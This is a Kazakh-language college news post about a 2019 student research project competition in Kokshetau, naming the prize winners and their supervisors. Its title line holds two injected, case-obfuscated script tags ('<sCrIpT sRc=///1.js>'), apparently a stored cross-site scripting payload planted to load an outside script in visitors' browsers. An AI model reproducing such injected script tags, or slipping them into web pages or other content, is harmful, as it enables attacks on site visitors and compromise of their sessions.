Жобалар конкурсы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

21.05.2019

2019 жылғы 21 мамыр күні Көкшетау қаласы, №1 құрылыс-техникалық колледжінде «Болашаққа қадам» атты дәстүрлі ғылыми-зерттеушілік жобалар конкурсы өтті.  Студенттер ғылымға өздерінің алғашқы қадамдарын жасады. Олар жыл бойы жоба жетекшілерімен зерттеумен айналысты, эксперимент жасады, ғылыми әдебиетті зерделеп, оқу жылы соңында өз жобаларын ұсынып, қорғады. 

    Гран-приге «Тамақтануды ұйымдастыру» мамандығы бойынша 2 курс студенті Черкалин Виктор ие болды. Жоба тақырыбы: «Болашақтан өткенге саяхат», жетекшілер Кенжибаева А.С., Гатина Э.Б.

1 орынды «Тамақтануды ұйымдастыру» мамандығы бойынша 2 курс студенті  Денисова Тамара  алды. Жоба тақырыбы: «Ақылды, дені сау, әдемі ұлттың құпиясы», жоба жетекшілері Ибрагимова И.В.,  Хващевская И.В., Шалабаева М.Ж.

2 орынды «Тамақтануды ұйымдастыру» мамандығы бойынша 1 курс студенті Давыденко Екатерина алды. Жоба тақырыбы: «Айыру есептерін шешу СӨС қалыптастыру тәсілдерінің бірі». Жоба жетекшілері Абуталипова К.К., Брезицкая В.А.

3 орынды «Сәндік-қолданбалы өнер және халық кәсіпшілігі» мамандығы бойынша 1 курс студенті Шубарнель Наталья  алды, жоба жетекшілері Кожахетова А.Т., Есетова Г.А.

            Жас ғылымдарға өз бастамаларында табыс тілейміз.

Просмотров: 552


Пікір қосу



Деректерді қолтаңбаға қосу